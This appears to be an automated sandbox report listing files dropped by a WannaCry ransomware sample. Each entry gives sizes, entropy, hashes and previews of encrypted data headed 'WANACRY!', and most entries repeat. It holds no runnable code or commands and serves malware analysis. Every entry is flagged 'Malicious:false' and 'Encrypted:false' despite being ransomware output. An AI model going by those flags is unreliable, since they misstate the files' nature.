                                                                              Preview:WANACRY!......!.=.o.T.I~.]A|.):..s..U.7:Y..Q...i..N.i..O.p..h....r.....*<.^...C.U... .=(p.dEg.K....n...*..F..W`U....^...w..+...gH{...)Stx{....-....//....nW_[D.P.e.<<G[..p....6.W....}>.."..V.bJe......Y..5./a..qZ].k.O..}...dT...!V..T(......Z..I..t...B.................N....X..N.\....WYo.z.....b.....!.=1.B....4 O.....f.....6t...-B>...yZ[u...T..i..H.V........3..^5.]..-7..h.o..$..-b.y.8....SJ..t ..V.G./a.OT`.n...f>:o.q...h..@.t.7..\M.m.\.Mm.U'W....1.....x.f.=p../t.N0c....%.....d..S......-.h&%..d....JYq..E.M.:.....v..o..Q.]7..4..kM.5.^.pv...f[..8e.*z..'d..@e...UO.3"...t..d.T..j.p|...7...dh..G..i...}..J.X...[...>+...G.0..'....R)}7...J.:...3K0....&5.N...Z.....1 7.....?...V...)~i..t.l~%...T.V....'..^...S..O[.M.Vua........a......w.l.......qNH...X.P....?..y.....).r+..eP..n .........Dd.~..."..........O.Gx.m.Fw..d.5!.X.%....1.....E7............>..nd......i.u!......F].X.{~..^.B,..q...N'C....<J$..`h.z;n@(p......`....E..B.k..c.9......B...D
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):4072
                                                                              Entropy (8bit):7.953705015145272
                                                                              Encrypted:false
                                                                              SSDEEP:96:o4V78/Y/awdF/4gw4YqLhJJFGUEPMusHK:HVy7yaOL3Fn9HK
                                                                              MD5:D6D85BD9C11CB017334E04F45982A180
                                                                              SHA1:3CF2C3A13AE0C27A1ACC4FA6561C1506E2C3258B
                                                                              SHA-256:4019D20C1E3D1D2BFB4D18C6C31FCD6F75E3D28DBFBD54BD036223C3E0374DF5
                                                                              SHA-512:569F69A8C3BA77DC5E0570F96C7A607030EB733AE32979CBB6F5AA6BA6DCBB01332F8A71BF53AEA50ED4DF8C5584EB03C8C58E1F1218CB0008B568206C966571
                                                                              Malicious:false
                                                                              Preview:WANACRY!......!.=.o.T.I~.]A|.):..s..U.7:Y..Q...i..N.i..O.p..h....r.....*<.^...C.U... .=(p.dEg.K....n...*..F..W`U....^...w..+...gH{...)Stx{....-....//....nW_[D.P.e.<<G[..p....6.W....}>.."..V.bJe......Y..5./a..qZ].k.O..}...dT...!V..T(......Z..I..t...B.................N....X..N.\....WYo.z.....b.....!.=1.B....4 O.....f.....6t...-B>...yZ[u...T..i..H.V........3..^5.]..-7..h.o..$..-b.y.8....SJ..t ..V.G./a.OT`.n...f>:o.q...h..@.t.7..\M.m.\.Mm.U'W....1.....x.f.=p../t.N0c....%.....d..S......-.h&%..d....JYq..E.M.:.....v..o..Q.]7..4..kM.5.^.pv...f[..8e.*z..'d..@e...UO.3"...t..d.T..j.p|...7...dh..G..i...}..J.X...[...>+...G.0..'....R)}7...J.:...3K0....&5.N...Z.....1 7.....?...V...)~i..t.l~%...T.V....'..^...S..O[.M.Vua........a......w.l.......qNH...X.P....?..y.....).r+..eP..n .........Dd.~..."..........O.Gx.m.Fw..d.5!.X.%....1.....E7............>..nd......i.u!......F].X.{~..^.B,..q...N'C....<J$..`h.z;n@(p......`....E..B.k..c.9......B...D
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):7000
                                                                              Entropy (8bit):7.971339661370102
                                                                              Encrypted:false
                                                                              SSDEEP:192:Mm/DfkHUV2xJc3rQB6YmJ8sEuto0E+WCqMjIcGGb93f/:h0USkTYAvFhE+WwkGb9n
                                                                              MD5:12C72F9E10ADA3F2FA998F62A56A134F
                                                                              SHA1:2C42490A806435F2B43CF96AB31A25D2DFD8DC0C
                                                                              SHA-256:73B1B35A4BCA3A8B6B54CBE3983249E9C5645866A535D1AEDB49045FCE33C2B8
                                                                              SHA-512:5794A896A7FFBD200BD088CF083205DBAB5A486A2FF7C99FC4693FC8D2CE0F0F059E77F50470231A28DAD9978A1D6D9ADA00F5BDFE09B9E313B802B86C5A181E
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....!.......eG.S.7db.a.b.D9.....,.AQ.'.. ....,......k#...8....;}.=.....O.g.^.....,.Y.....s:q}.....Q$..<.[..+.K..f.G&>......7....{.........N..?Z..=..Y..0.....v.8+F8|...9...2.`..g.1.@.:..N.dN.Q!2......'...f(..,...m..` .H?...HO.....%.._m.p.?.5&....;.......C}._.......i@W.......Z)?./....gf.;.:.40...... ug..D:E.Z4~..U.....4C7....x.../..@.L.Ukuf7.....,....S{;g*.d..u...f...Q.."W...\|eM).l.....D..l...d<....KV_...s........H...R.E.....zi\lW.....G.....,..tr..Be|.f.Q.3T..l....VWl.E....uj.fs....'%".9.#<....k...j{u.(.q!{z.{].-....X.....].?.G.op..N.{.C.. .(...h..*.&.....qq.........S:..:..;P....@^(9w.WD...1.[1{....B;x09.0...T?`.m.n.w....k@RZ .e...6..*...U2K`V.W...{.B^..u..~........d..^.7.+..S.>..#..o..g.<./*<..Mi........W.f..ih.-...hFw.s8...Y..e.u.'Z..'.....C.%.^....../f..9.s..Ofl.........CcH.I.:..o...-.|dO.-...4....p.Ejz..N.V~..W..M.a.L$.....Jf.X5...g........{:.{.z.?.s...V..,..X...i.l.>.....17 .bN.....Q.CE..)G...pQ.t+..%..Sl#O . GnsGA.uD.j.w....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):7000
                                                                              Entropy (8bit):7.971339661370102
                                                                              Encrypted:false
                                                                              SSDEEP:192:Mm/DfkHUV2xJc3rQB6YmJ8sEuto0E+WCqMjIcGGb93f/:h0USkTYAvFhE+WwkGb9n
                                                                              MD5:12C72F9E10ADA3F2FA998F62A56A134F
                                                                              SHA1:2C42490A806435F2B43CF96AB31A25D2DFD8DC0C
                                                                              SHA-256:73B1B35A4BCA3A8B6B54CBE3983249E9C5645866A535D1AEDB49045FCE33C2B8
                                                                              SHA-512:5794A896A7FFBD200BD088CF083205DBAB5A486A2FF7C99FC4693FC8D2CE0F0F059E77F50470231A28DAD9978A1D6D9ADA00F5BDFE09B9E313B802B86C5A181E
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....!.......eG.S.7db.a.b.D9.....,.AQ.'.. ....,......k#...8....;}.=.....O.g.^.....,.Y.....s:q}.....Q$..<.[..+.K..f.G&>......7....{.........N..?Z..=..Y..0.....v.8+F8|...9...2.`..g.1.@.:..N.dN.Q!2......'...f(..,...m..` .H?...HO.....%.._m.p.?.5&....;.......C}._.......i@W.......Z)?./....gf.;.:.40...... ug..D:E.Z4~..U.....4C7....x.../..@.L.Ukuf7.....,....S{;g*.d..u...f...Q.."W...\|eM).l.....D..l...d<....KV_...s........H...R.E.....zi\lW.....G.....,..tr..Be|.f.Q.3T..l....VWl.E....uj.fs....'%".9.#<....k...j{u.(.q!{z.{].-....X.....].?.G.op..N.{.C.. .(...h..*.&.....qq.........S:..:..;P....@^(9w.WD...1.[1{....B;x09.0...T?`.m.n.w....k@RZ .e...6..*...U2K`V.W...{.B^..u..~........d..^.7.+..S.>..#..o..g.<./*<..Mi........W.f..ih.-...hFw.s8...Y..e.u.'Z..'.....C.%.^....../f..9.s..Ofl.........CcH.I.:..o...-.|dO.-...4....p.Ejz..N.V~..W..M.a.L$.....Jf.X5...g........{:.{.z.?.s...V..,..X...i.l.>.....17 .bN.....Q.CE..)G...pQ.t+..%..Sl#O . GnsGA.uD.j.w....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):2600
                                                                              Entropy (8bit):7.922989392300185
                                                                              Encrypted:false
                                                                              SSDEEP:48:bkeL7qiS1sbtJ3ytjbiKi+g8kTnK6AKacTZ/T72eaGaxNdjvtyQ/Cq65q:oeL7q71shb+MTnfAKbueCxNdRyaCg
                                                                              MD5:2ADF9526D8DF75CBC071CF1AA16D3CE7
                                                                              SHA1:1449C2FFB01AFFE9272651BE4FDB2D5258552C01
                                                                              SHA-256:741FCCB944A4F5DB3959C058775D2206B58FDCB8E7F8FE994786CEF48D997ED8
                                                                              SHA-512:359B2ED80E5E9A3A0DD2410B8D19054103C182E4B5403027DC568B45C9D2C6F05268EA5213DF2F1CDA88F9DE77BB77878EEAD46BF1B6666DF739C9A4D28AF46A
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....@$mj`..QFr ....&V.$..X..>e.V.9....7.4..a.o..tH".{Vf.?.P...7.P...d5... . ..,.cL......W....oOJ."$.~......n..e.......rY.......t.3.....g...I^!...;.....r(..5..LyP...RK.&.J-'VN.....94...g.........E/HV.......d~0..g.).....5-..........L.Z..b..|.%..5|H.0.I...............L6..6...i...x.n...`E0.{..rSzI......P.`.R.i...=..Q.......o..@#..5.Cy.|i..#.X...:..A.....r..[.Q.^A(..z'l`..je.].(YGI.2.....Z.4.[..A7R..).7g..}@......l.0I..6.]t5/..u.].......[..;R3u.....y..kM\..b...u..XP_>.V.W.....'.........m;..2V.w..-... I.pO.&.|....Bs......z{&.....fm... ..h..%W.=L...~. .$.l.g...$!T...mE.y|4!q..%5.B....}d...Tj..Kx....M..~.....m.....c..N.......A..R..p..hz....._.............m.K.0....>g.M.\...\S.;.4..(fH.G=.h..<.>o......4cj....-W..}...h..@C.r-!G.I8....0.e.8b>.:...'.......?......\.,F....r..f..V.o.n.QP..&.......2..&.;i.&.7.@..@...,.....B.d.2#mo.g.........=@".}R.'=..*.+..W.3[....G...[/un).+ ..kf.1.8H-....5:.Be./m..-'..s....,..<.../.. ..*...*!..lB?{b..$....h.3.(..N...K
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):2600
                                                                              Entropy (8bit):7.922989392300185
                                                                              Encrypted:false
                                                                              SSDEEP:48:bkeL7qiS1sbtJ3ytjbiKi+g8kTnK6AKacTZ/T72eaGaxNdjvtyQ/Cq65q:oeL7q71shb+MTnfAKbueCxNdRyaCg
                                                                              MD5:2ADF9526D8DF75CBC071CF1AA16D3CE7
                                                                              SHA1:1449C2FFB01AFFE9272651BE4FDB2D5258552C01
                                                                              SHA-256:741FCCB944A4F5DB3959C058775D2206B58FDCB8E7F8FE994786CEF48D997ED8
                                                                              SHA-512:359B2ED80E5E9A3A0DD2410B8D19054103C182E4B5403027DC568B45C9D2C6F05268EA5213DF2F1CDA88F9DE77BB77878EEAD46BF1B6666DF739C9A4D28AF46A
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....@$mj`..QFr ....&V.$..X..>e.V.9....7.4..a.o..tH".{Vf.?.P...7.P...d5... . ..,.cL......W....oOJ."$.~......n..e.......rY.......t.3.....g...I^!...;.....r(..5..LyP...RK.&.J-'VN.....94...g.........E/HV.......d~0..g.).....5-..........L.Z..b..|.%..5|H.0.I...............L6..6...i...x.n...`E0.{..rSzI......P.`.R.i...=..Q.......o..@#..5.Cy.|i..#.X...:..A.....r..[.Q.^A(..z'l`..je.].(YGI.2.....Z.4.[..A7R..).7g..}@......l.0I..6.]t5/..u.].......[..;R3u.....y..kM\..b...u..XP_>.V.W.....'.........m;..2V.w..-... I.pO.&.|....Bs......z{&.....fm... ..h..%W.=L...~. .$.l.g...$!T...mE.y|4!q..%5.B....}d...Tj..Kx....M..~.....m.....c..N.......A..R..p..hz....._.............m.K.0....>g.M.\...\S.;.4..(fH.G=.h..<.>o......4cj....-W..}...h..@C.r-!G.I8....0.e.8b>.:...'.......?......\.,F....r..f..V.o.n.QP..&.......2..&.;i.&.7.@..@...,.....B.d.2#mo.g.........=@".}R.'=..*.+..W.3[....G...[/un).+ ..kf.1.8H-....5:.Be./m..-'..s....,..<.../.. ..*...*!..lB?{b..$....h.3.(..N...K
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1576
                                                                              Entropy (8bit):7.858435555345899
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk4QrATJclpjINwuQjnLE/YWvW9qUZyQ/wA0ls4b7YDPjia244GB12hcL9o:bk4O6W/GwuAfL91IQ/o+4baPjcc2
                                                                              MD5:B5D445FA4975D4812BA1B9E8B317A979
                                                                              SHA1:9CDA82F60CD54352F4B85D70FF3D1CD646811350
                                                                              SHA-256:7EECDBE8C86E39DC41D00D752EACE1403B8F584D50A513B04446CCB256E8A39B
                                                                              SHA-512:7A02AB1848240361F5B286F04EE85D5A2437BF4791BC9282713EB4BB28FD5CD97097023E02016FE04217C26DCA55F4929B9846A5C24878200B9F75AB7042C1C2
                                                                              Malicious:false
                                                                              Preview:WANACRY!......q.k.U~C...11....&_..P.)..7.O..o.....".....l.B.g..QR.)..5....7ZV)..^........-,.........>..b`d.N8t..fk.t..iK*...G...N<..`.[......q^<I.....@.p~]..s..P.......e).+b..e....&....("V8..J.g.#C....hD..bp.M...=.]...J|Tn.i.Z.Q(<.\V+..0.W'..K.J.g......~.c7I"..c............y...YX..A.E.Px3....w......A..?g.FT`..@.j.+...l.J."....JI..V.>..h.Qw.f..1..?mj'.e.eN...#wu.Y\..q.4...s..^.N..e....?g....4......e...7.0.[.2...T/..3.a..;.../.T..pJ.#.... .}R.Ks...v.......fl.vS.R.U.;6.:.......XP..O...U...c.z.">q.iU.jlv.....M:.FC......2Z.y.U...a.i.X...Lj..[...k?/.....]...UW.d.-....8r..S.`.K.K...dT.^..U...K&...d.ymS.......#..=J....js.a.p........VB.../t...0v.....g.....B"....X0..@...,.?.s+....toY...iPE........q......lv.9.....}.@..#.!...c.#sX.{4.W# Q...%.,.....7..f.......C..8.m.S..{..fk..&.i.:*....%...x.r.......%z.$...1...S.....e..j.=...OK..Xz2h..$7...eE...O..jv...U.m..3.XJzXP]h...;x~...........t.X.@..nT*W9.:..J8#.l|.Um.....7............G._....[.f.W.....60?....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1576
                                                                              Entropy (8bit):7.858435555345899
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk4QrATJclpjINwuQjnLE/YWvW9qUZyQ/wA0ls4b7YDPjia244GB12hcL9o:bk4O6W/GwuAfL91IQ/o+4baPjcc2
                                                                              MD5:B5D445FA4975D4812BA1B9E8B317A979
                                                                              SHA1:9CDA82F60CD54352F4B85D70FF3D1CD646811350
                                                                              SHA-256:7EECDBE8C86E39DC41D00D752EACE1403B8F584D50A513B04446CCB256E8A39B
                                                                              SHA-512:7A02AB1848240361F5B286F04EE85D5A2437BF4791BC9282713EB4BB28FD5CD97097023E02016FE04217C26DCA55F4929B9846A5C24878200B9F75AB7042C1C2
                                                                              Malicious:false
                                                                              Preview:WANACRY!......q.k.U~C...11....&_..P.)..7.O..o.....".....l.B.g..QR.)..5....7ZV)..^........-,.........>..b`d.N8t..fk.t..iK*...G...N<..`.[......q^<I.....@.p~]..s..P.......e).+b..e....&....("V8..J.g.#C....hD..bp.M...=.]...J|Tn.i.Z.Q(<.\V+..0.W'..K.J.g......~.c7I"..c............y...YX..A.E.Px3....w......A..?g.FT`..@.j.+...l.J."....JI..V.>..h.Qw.f..1..?mj'.e.eN...#wu.Y\..q.4...s..^.N..e....?g....4......e...7.0.[.2...T/..3.a..;.../.T..pJ.#.... .}R.Ks...v.......fl.vS.R.U.;6.:.......XP..O...U...c.z.">q.iU.jlv.....M:.FC......2Z.y.U...a.i.X...Lj..[...k?/.....]...UW.d.-....8r..S.`.K.K...dT.^..U...K&...d.ymS.......#..=J....js.a.p........VB.../t...0v.....g.....B"....X0..@...,.?.s+....toY...iPE........q......lv.9.....}.@..#.!...c.#sX.{4.W# Q...%.,.....7..f.......C..8.m.S..{..fk..&.i.:*....%...x.r.......%z.$...1...S.....e..j.=...OK..Xz2h..$7...eE...O..jv...U.m..3.XJzXP]h...;x~...........t.X.@..nT*W9.:..J8#.l|.Um.....7............G._....[.f.W.....60?....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):5480
                                                                              Entropy (8bit):7.968344933037929
                                                                              Encrypted:false
                                                                              SSDEEP:96:ogcFpc0Rxf15+YbTsbzGBon/Ttb2pxhILnjyZOGL3H5JzyW9kCCnLqzeVaIYtg:KFHxL+M8bBbFLnyOGDn9krGyQg
                                                                              MD5:4E67BE858ECA84A7AEFEE365C1C82507
                                                                              SHA1:875FF9226BF45C2CCEB8F43817619D10280BCF90
                                                                              SHA-256:CBAC17E64A86F7895A1BDA5204F324A1597CF49071EF2975DF8838D48BE8FA5C
                                                                              SHA-512:54F8392EB0BC21281F85B3952204E88E460E7CAEABA1ED0052F7BFFC2E078F6E8D62B2DD90F13CB3508CE6CD81800D5A7495E7FE83D977A98BFE33E53E4BB9C4
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....v:|].4K.h..2..B..l..ZW..\.....P.C.....H...N.....l..^..0.......*.~qz...X..6.g?../.....1+...UE.Z.1..........Ri..x.....N.f.~.h6..T.}..{.L..#.Ch.-R.P.:O...w@.FV....3..2.c..]....~I.1...'#......_.+u..:p.V.*....X~n....'w.nW.....Z...;.b....3${..I........G........<.5....".R...S.U.3..m.8,....9<'..pr.A2W.o.s......7....wC..0.W..+.\...O...<.S..H...%.`....n.J..0'.a...5...=2.ycE..........+.........c.N.KnY...r1.O...7.b.*..,....O.4h+.x.....'A......!.Z....!.....-wc.4.mAn..@.~..r..Qx....M.......YwW.7..`aR.z.....O..H9..I...S.....<9.%A...BaJE0.K..8..l...s............y._....fp.)...[.%..s.{u(.cH.....9.lM.9.&MbC...;.\."E2....0#48.H.....eJ..ESP.x..............#..N.})`.....;..u=.V.l.L+...-.....fN....}u...}..5n.7....p.bjr.......BP....o.0^..b{b[..]1.W.'.$/Y.{...m.Y`q &..`.PR@ ..u....,g.b....|........G.&+.9.,.....UG..>M..r.............U..R..|.....e..,.D.'..{e'Tu.....3...T ...'/.I.....E.n?....=V..M.HZ..t.U .{\..!..(..M..}z7....$...O...`...jLI;0b.P.L....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):5480
                                                                              Entropy (8bit):7.968344933037929
                                                                              Encrypted:false
                                                                              SSDEEP:96:ogcFpc0Rxf15+YbTsbzGBon/Ttb2pxhILnjyZOGL3H5JzyW9kCCnLqzeVaIYtg:KFHxL+M8bBbFLnyOGDn9krGyQg
                                                                              MD5:4E67BE858ECA84A7AEFEE365C1C82507
                                                                              SHA1:875FF9226BF45C2CCEB8F43817619D10280BCF90
                                                                              SHA-256:CBAC17E64A86F7895A1BDA5204F324A1597CF49071EF2975DF8838D48BE8FA5C
                                                                              SHA-512:54F8392EB0BC21281F85B3952204E88E460E7CAEABA1ED0052F7BFFC2E078F6E8D62B2DD90F13CB3508CE6CD81800D5A7495E7FE83D977A98BFE33E53E4BB9C4
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....v:|].4K.h..2..B..l..ZW..\.....P.C.....H...N.....l..^..0.......*.~qz...X..6.g?../.....1+...UE.Z.1..........Ri..x.....N.f.~.h6..T.}..{.L..#.Ch.-R.P.:O...w@.FV....3..2.c..]....~I.1...'#......_.+u..:p.V.*....X~n....'w.nW.....Z...;.b....3${..I........G........<.5....".R...S.U.3..m.8,....9<'..pr.A2W.o.s......7....wC..0.W..+.\...O...<.S..H...%.`....n.J..0'.a...5...=2.ycE..........+.........c.N.KnY...r1.O...7.b.*..,....O.4h+.x.....'A......!.Z....!.....-wc.4.mAn..@.~..r..Qx....M.......YwW.7..`aR.z.....O..H9..I...S.....<9.%A...BaJE0.K..8..l...s............y._....fp.)...[.%..s.{u(.cH.....9.lM.9.&MbC...;.\."E2....0#48.H.....eJ..ESP.x..............#..N.})`.....;..u=.V.l.L+...-.....fN....}u...}..5n.7....p.bjr.......BP....o.0^..b{b[..]1.W.'.$/Y.{...m.Y`q &..`.PR@ ..u....,g.b....|........G.&+.9.,.....UG..>M..r.............U..R..|.....e..,.D.'..{e'Tu.....3...T ...'/.I.....E.n?....=V..M.HZ..t.U .{\..!..(..M..}z7....$...O...`...jLI;0b.P.L....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.854305411015955
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkYudv12f8c1W0JgusJ8cd1F3IQEpE0asQ0EO17X4aZV8o1xjwBYwLQkB76m9T:bkYudv12J1WvtGcd1Xd0VQsX1r51xkBd
                                                                              MD5:5F10488D22D38F28620C54C59CA9E932
                                                                              SHA1:E47BACBA5AF85A4726B20522670FC7CE89CCFE83
                                                                              SHA-256:928F5DA69BF5A456B567EADFF1F0BCEDFB2FF104BAF50CEFF5F12049BF3CF836
                                                                              SHA-512:81BD9314154CDBEF3A917ABF7EB19DEEE8BC26817F501817CABB9736E0058DAF76B159E3E453DFBE14C29B7EF59BEDC8D26529C3C0291BD27CB04A9C4AE601CD
                                                                              Malicious:false
                                                                              Preview:WANACRY!....'.7n0.01..j.,..2`a9.G.U....4&.LO.\.....Ui..$2f....7..V|.[..[..5.....w.pa...... ....A.P..FC....I.8....-.>....n.Q\%.o.........u~.."..4~..yO.h.5Z..@.BYl.L.*c/h......,G.b.,.......8/.e.3g.Gi%.N.v....B8c.B9T^..Hp.d..'/....E..T..X.C.X.`........).J_4kW............n......:5......C.5...}....x^.. ..#...#..H~......I........i:.ky..nI.x...yg....g...>v..U.../:.......S".....J.H{p=...uW.<a....'....N...)R............,9;.H2.s.........ge5.....MK...i(.x...X.[.hGK..L[...[..,;..t.C.U(>q...Mo..K...S........y,..*...;..!.W.=..3.Q:w:...*.....2.3...n....m..~_.. .........ku&..Bm.+Z....kv..1...v;V..66.u..>......Lh_c6..z.........O(..LV....5.[d'...m~.vt..-/.1..(.e....;.+...>.....D.-Y.=M...Z.+.#I.$.{....:.N..E]`..^/>.w2..$FmZu.1....K..6PU.aW..F. .=7l.~....0.>..p.........u.|8....z....Fn..66......)1..'.&<..s....P3g.t...h.....z..2.~...^..N......R.T.Y>..R.s..G.~..h`"'._......!WJ.~g/...8.@...F.UZ...!.O...D.wv:....!...Nj.d.?......0...T..V..^M._l....+..8...3..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.854305411015955
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkYudv12f8c1W0JgusJ8cd1F3IQEpE0asQ0EO17X4aZV8o1xjwBYwLQkB76m9T:bkYudv12J1WvtGcd1Xd0VQsX1r51xkBd
                                                                              MD5:5F10488D22D38F28620C54C59CA9E932
                                                                              SHA1:E47BACBA5AF85A4726B20522670FC7CE89CCFE83
                                                                              SHA-256:928F5DA69BF5A456B567EADFF1F0BCEDFB2FF104BAF50CEFF5F12049BF3CF836
                                                                              SHA-512:81BD9314154CDBEF3A917ABF7EB19DEEE8BC26817F501817CABB9736E0058DAF76B159E3E453DFBE14C29B7EF59BEDC8D26529C3C0291BD27CB04A9C4AE601CD
                                                                              Malicious:false
                                                                              Preview:WANACRY!....'.7n0.01..j.,..2`a9.G.U....4&.LO.\.....Ui..$2f....7..V|.[..[..5.....w.pa...... ....A.P..FC....I.8....-.>....n.Q\%.o.........u~.."..4~..yO.h.5Z..@.BYl.L.*c/h......,G.b.,.......8/.e.3g.Gi%.N.v....B8c.B9T^..Hp.d..'/....E..T..X.C.X.`........).J_4kW............n......:5......C.5...}....x^.. ..#...#..H~......I........i:.ky..nI.x...yg....g...>v..U.../:.......S".....J.H{p=...uW.<a....'....N...)R............,9;.H2.s.........ge5.....MK...i(.x...X.[.hGK..L[...[..,;..t.C.U(>q...Mo..K...S........y,..*...;..!.W.=..3.Q:w:...*.....2.3...n....m..~_.. .........ku&..Bm.+Z....kv..1...v;V..66.u..>......Lh_c6..z.........O(..LV....5.[d'...m~.vt..-/.1..(.e....;.+...>.....D.-Y.=M...Z.+.#I.$.{....:.N..E]`..^/>.w2..$FmZu.1....K..6PU.aW..F. .=7l.~....0.>..p.........u.|8....z....Fn..66......)1..'.&<..s....P3g.t...h.....z..2.~...^..N......R.T.Y>..R.s..G.~..h`"'._......!WJ.~g/...8.@...F.UZ...!.O...D.wv:....!...Nj.d.?......0...T..V..^M._l....+..8...3..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1656
                                                                              Entropy (8bit):7.87319469207191
                                                                              Encrypted:false
                                                                              SSDEEP:48:bkL5Rs2ml/V7jsUaQQcDcV/fwWeUPjudowSmHI:olmv7wR7dYUY0mo
                                                                              MD5:88826A61538D19DBA576791B46C168AB
                                                                              SHA1:162174421D3FDAAACC5537C3A94DB71F53C9D6A5
                                                                              SHA-256:9EF57D0426D3A47271E57773A0E33A745A24B6D208B60A24049EF23F9748EAC9
                                                                              SHA-512:7E05B54C747DA57D44BF9FD6B32B39DD066D1CAE18E69B8185168D8548D603A05BBDA26082CFEAECE8B4722575159418B3FE42D2562FB3022E8D22CED19E0737
                                                                              Malicious:false
                                                                              Preview:WANACRY!......*- L.N......a..h.1.=:.,..*..x.?..&.^iO.....z.P...A.}N...#...A..s......D.......1`m.]...W /..........k..L.X.....d.s...L.+D;BD.........u.....\.J.+.h<g.W.D|j......l.+9.!.Q...G...a}e3...VH.q.K.\v.{.!.....j..."dE~.<X0ux.S......`......x..r...X.........Y..........7eze.((0......\....n.'..kq.....U.K.W.....1..0z.l..'*._R9...A....v9...U}..]..L.vD..F.!....f....;..yA....e92._.t.g,..%.gv........c...x..k...q/c.V....P[O<j..S.55F{....G&2..f:....\.#L..9qA0>......H.t,...91......$...4..x.y........:`lyC.T......n...!..d6+...K"w.nq..x.h...nS.6.[..~Ee.iC].F../.DU:.:..L T.u..@../..w..4.....Tp#j.."S.....@.~\"..3...F...'~.&\.2.<.o-.....^./.....g...".....!].Dg...0.f1.0./..t..E.=u...8.o.!.n...R}N.(9I.bN.3heA&l.g.t<.!.0..i.g..(....g..h.q.B.5........_!.).....$.!6Z..kDYG1.n....<6.....9.......-..C....S7.6/..W.q.#.D..fv...4.g....e....=.].,...U.'...a...P...a...].%5.]..&e.9....fOwj.c._I<.^~&./..j...^...sL7.K).Ub{=T....w.< '.A.v..<.V8a....a..2.........`...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1656
                                                                              Entropy (8bit):7.87319469207191
                                                                              Encrypted:false
                                                                              SSDEEP:48:bkL5Rs2ml/V7jsUaQQcDcV/fwWeUPjudowSmHI:olmv7wR7dYUY0mo
                                                                              MD5:88826A61538D19DBA576791B46C168AB
                                                                              SHA1:162174421D3FDAAACC5537C3A94DB71F53C9D6A5
                                                                              SHA-256:9EF57D0426D3A47271E57773A0E33A745A24B6D208B60A24049EF23F9748EAC9
                                                                              SHA-512:7E05B54C747DA57D44BF9FD6B32B39DD066D1CAE18E69B8185168D8548D603A05BBDA26082CFEAECE8B4722575159418B3FE42D2562FB3022E8D22CED19E0737
                                                                              Malicious:false
                                                                              Preview:WANACRY!......*- L.N......a..h.1.=:.,..*..x.?..&.^iO.....z.P...A.}N...#...A..s......D.......1`m.]...W /..........k..L.X.....d.s...L.+D;BD.........u.....\.J.+.h<g.W.D|j......l.+9.!.Q...G...a}e3...VH.q.K.\v.{.!.....j..."dE~.<X0ux.S......`......x..r...X.........Y..........7eze.((0......\....n.'..kq.....U.K.W.....1..0z.l..'*._R9...A....v9...U}..]..L.vD..F.!....f....;..yA....e92._.t.g,..%.gv........c...x..k...q/c.V....P[O<j..S.55F{....G&2..f:....\.#L..9qA0>......H.t,...91......$...4..x.y........:`lyC.T......n...!..d6+...K"w.nq..x.h...nS.6.[..~Ee.iC].F../.DU:.:..L T.u..@../..w..4.....Tp#j.."S.....@.~\"..3...F...'~.&\.2.<.o-.....^./.....g...".....!].Dg...0.f1.0./..t..E.=u...8.o.!.n...R}N.(9I.bN.3heA&l.g.t<.!.0..i.g..(....g..h.q.B.5........_!.).....$.!6Z..kDYG1.n....<6.....9.......-..C....S7.6/..W.q.#.D..fv...4.g....e....=.].,...U.'...a...P...a...].%5.]..&e.9....fOwj.c._I<.^~&./..j...^...sL7.K).Ub{=T....w.< '.A.v..<.V8a....a..2.........`...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1800
                                                                              Entropy (8bit):7.897199624217603
                                                                              Encrypted:false
                                                                              SSDEEP:48:bkMuvc0et842N0xReL+phdz/vQpm0493TuZIzV:orc0etD2N0x4+phdj8mRuZI5
                                                                              MD5:96CAE82B2B748EE18A05AA7CB24127AE
                                                                              SHA1:57C5A238606DCE53A5C9BC57129626342F8DC929
                                                                              SHA-256:8839E467F7F6BBE39C1362C7A4854D05A26C2186347694A2EAA5E6B09BE0E804
                                                                              SHA-512:693199D82B85EDEDE5E5D8115711995723B10D734324AF6C2C7EFA27B91A9FE4F305E27584DBB27BCF38AB38FCCF9E79A9196D5E6D51BD68EBC2FAA886E5C1BC
                                                                              Malicious:false
